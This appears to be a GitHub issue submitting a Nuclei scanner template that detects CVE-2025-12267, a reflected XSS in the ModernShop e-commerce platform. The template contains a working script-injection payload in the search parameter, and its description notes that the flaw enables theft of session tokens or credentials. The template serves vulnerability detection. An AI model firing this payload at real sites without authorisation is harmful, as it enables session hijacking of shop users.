cve-2025-12267

### Is there an existing template for this?

- [x] I have searched the existing templates.

### Nuclei Template

```yaml
id: cve-2025-12267

info:
  name: ModernShop - Reflected XSS
  author: 0xr2r
  severity: high
  description: |
    Attacker can send a link containing a malicious URL in an email or instant message, allowing them to perform actions like stealing session tokens or login credentials.
  tags: xss,cve,cve-2025-12267
  reference:
    - https://www.codester.com/items/comments/58847/modern-shop-php-ecommerce-platform

http:
  - method: GET
    path:
      - "{{BaseURL}}/search?q=1bwkni><script>alert(1)</script>hu1c6"
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(1)</script>"
      - type: status
        status:
          - 200
```

### Relevant dumped responses

```shell

```

### Anything else?

_No response_

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

cve-2025-12267 #13876

Is there an existing template for this?

Nuclei Template

Relevant dumped responses

Anything else?

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

cve-2025-12267 #13876

Description

Is there an existing template for this?

Nuclei Template

Relevant dumped responses

Anything else?

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions